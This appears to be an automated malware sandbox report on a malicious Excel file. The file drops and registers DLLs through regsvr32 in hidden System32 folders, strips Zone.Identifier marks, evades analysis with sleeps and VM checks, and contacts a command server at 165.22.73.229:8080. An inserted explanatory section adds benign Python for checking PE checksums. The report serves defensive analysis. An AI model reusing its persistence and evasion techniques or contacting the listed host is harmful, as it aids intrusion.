Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6882.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@18/18@5/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: DETAILS 25922194612.xls OLE indicator, Workbook stream: true
Source: DETAILS 25922194612.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180029710 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 4_2_0000000180029710
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: DETAILS 25922194612.xls Initial sample: OLE indicators vbamacros = False
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180006951 pushad ; retf 3_2_0000000180006953
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180006951 pushad ; retf 5_2_0000000180006953
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180006951 pushad ; retf 8_2_0000000180006953
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180006951 pushad ; retf 10_2_0000000180006953
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 3_2_000007FEF9D30CC0
Source: T35PENELLOsp[1].dll.0.dr Static PE information: CheckSum stored in the header: 0x61dc7, checksum computed over the file: 0x5caa2 (mismatch)
Source: Jf8[1].dll.0.dr Static PE information: CheckSum stored in the header: 0x61dc7, checksum computed over the file: 0x5ef33 (mismatch)
Source: uxevr1.ocx.0.dr Static PE information: CheckSum stored in the header: 0x61dc7, checksum computed over the file: 0x5ef33 (mismatch)
Source: 1Cb5zOjLgWGDemz55C5[1].dll.0.dr Static PE information: CheckSum stored in the header: 0x61dc7, checksum computed over the file: 0x64194 (mismatch)
Source: uxevr3.ocx.0.dr Static PE information: CheckSum stored in the header: 0x61dc7, checksum computed over the file: 0x64194 (mismatch)
Source: uxevr2.ocx.0.dr Static PE information: CheckSum stored in the header: 0x61dc7, checksum computed over the file: 0x644de (mismatch)
Source: 4HWP0KQI[1].dll.0.dr Static PE information: CheckSum stored in the header: 0x61dc7, checksum computed over the file: 0x644de (mismatch)
Source: uxevr4.ocx.0.dr Static PE information: CheckSum stored in the header: 0x61dc7, checksum computed over the file: 0x5caa2 (mismatch)
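Two things are worth reading out of the eight checksum lines above. All four payloads carry the same header CheckSum, 0x61dc7, although they are different files, which suggests the header was stamped from a template rather than written by a linker. And the computed values pair each Content.IE5 download with one of the .ocx files Excel wrote to C:\Users\user (Jf8[1].dll and uxevr1.ocx both give 0x5ef33, 4HWP0KQI[1].dll and uxevr2.ocx 0x644de, 1Cb5zOjLgWGDemz55C5[1].dll and uxevr3.ocx 0x64194, T35PENELLOsp[1].dll and uxevr4.ocx 0x5caa2), so each cached download and its .ocx copy are the same bytes under two names. The following added example, which is not part of the report, implements the CheckSum algorithm that produces the computed value (the same one pefile's generate_checksum() reproduces) so the comparison can be redone on any PE. Because the sample's files are not on this page, the image it runs against is a minimal PE32+ skeleton constructed inline; that image and the offsets it uses are assumptions, not data from the sample.

```python
"""IMAGE_OPTIONAL_HEADER.CheckSum verification.

Added example, not part of the sandbox report. The PE image built by
build_minimal_pe() is constructed so the code runs without the sample; it
is not one of the dropped files.
"""
import struct


def checksum_field_offset(data):
    """File offset of OptionalHeader.CheckSum: e_lfanew + PE signature (4) + COFF header (20) + 64."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return e_lfanew + 4 + 20 + 64


def compute_checksum(data):
    """Checksum as Windows computes it: 32-bit little-endian words summed with
    end-around carry, the CheckSum field itself taken as zero, folded to 16 bits,
    plus the file length."""
    off = checksum_field_offset(data)
    buf = bytearray(data) + b"\0" * (-len(data) % 4)  # pad to a dword boundary
    buf[off:off + 4] = b"\0\0\0\0"                     # the field is excluded from its own sum
    total = 0
    for (dword,) in struct.iter_unpack("<I", buf):
        total += dword
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def stored_checksum(data):
    """The CheckSum value present in the optional header."""
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def verify_checksum(data):
    """Return (stored, computed, matches). A stored value of 0 means none was ever set."""
    stored, computed = stored_checksum(data), compute_checksum(data)
    return stored, computed, stored == computed


def set_checksum(data):
    """Return a copy whose header carries the correct CheckSum for its contents."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, checksum_field_offset(data), compute_checksum(data))
    return bytes(buf)


def build_minimal_pe(payload=b"\0" * 0x200):
    """Constructed PE32+ skeleton: DOS header, COFF header, optional header, one section."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x2022)  # x64, 1 section, DLL
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                            # PE32+ magic; CheckSum (offset 64) stays 0
    section = bytearray(40)
    section[:5] = b".text"
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(section)
    headers += b"\0" * (0x200 - len(headers))
    return headers + payload


def report_line(name, data):
    """Render the verdict in the sandbox's wording."""
    stored, computed, ok = verify_checksum(data)
    if ok:
        return f"{name} Static PE information: checksum 0x{stored:x} is correct"
    return f"{name} Static PE information: real checksum: 0x{stored:x} should be: 0x{computed:x}"


if __name__ == "__main__":
    image = set_checksum(build_minimal_pe())
    print(report_line("constructed.dll", image))
    damaged = bytearray(image)
    damaged[0x300] ^= 0x41          # one byte of section data changed, header untouched
    print(report_line("constructed.dll", bytes(damaged)))
```

A mismatch on its own is weak evidence, since plenty of legitimate binaries ship with CheckSum left at zero; the signal in this report is a non-zero value that is wrong in the same way across four different files.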
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\KuSAkvGE\rWFJGQNl.dll (copy)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\FiPeSYwmr\Wuiko.dll (copy)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\Ejpzh\qlDqXeGagKnBKzd.dll (copy)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\KuSAkvGE\rWFJGQNl.dll (copy)
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\FiPeSYwmr\Wuiko.dll (copy)
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy)
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\Ejpzh\qlDqXeGagKnBKzd.dll (copy)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx

Boot Survival

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\FiPeSYwmr\Wuiko.dll:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\regsvr32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe TID: 1468 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 2588 Thread sleep time: -300000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1292 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 2960 Thread sleep time: -240000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 464 Thread sleep time: -240000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 900 Thread sleep time: -240000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1268 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 2224 Thread sleep time: -240000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
Source: C:\Windows\System32\regsvr32.exe API coverage: 8.6 %
Source: C:\Windows\System32\regsvr32.exe API coverage: 8.6 %
Source: C:\Windows\System32\regsvr32.exe API coverage: 7.7 %
Source: C:\Windows\System32\regsvr32.exe API coverage: 7.7 %
Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 4_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 7_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 9_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 11_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 11_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: regsvr32.exe, 0000000A.00000002.950666041.0000000000228000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: RomNECVMWar_VMware_SATA_CD01_______________1.00___
Source: regsvr32.exe, 00000008.00000002.943436564.000000000038A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_000007FEF9D23280
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error, 3_2_000007FEF9D30215
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 3_2_000007FEF9D30CC0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_000007FEF9D23280
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D2BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_000007FEF9D2BE50
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF7533280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_000007FEF7533280
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF753BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_000007FEF753BE50
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000007FEF74D3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_000007FEF74D3280
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000007FEF74DBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_000007FEF74DBE50
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000007FEF70CBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_000007FEF70CBE50
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000007FEF70C3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_000007FEF70C3280

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\regsvr32.exe Network Connect: 165.22.73.229 8080
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FiPeSYwmr\Wuiko.dll"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll"
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D28900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 3_2_000007FEF9D28900
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D28860 HeapCreate,GetVersion,HeapSetInformation, 3_2_000007FEF9D28860

Stealing of Sensitive Information

Source: Yara match File source: 10.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.regsvr32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.regsvr32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.1219777301.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1218923490.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.935437838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.950850615.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.935123835.00000000003E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.944087304.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1219645231.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1218912030.0000000000150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1218942103.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.951348566.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.926422500.0000000000300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.943168453.00000000002D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1218930467.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1219706572.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY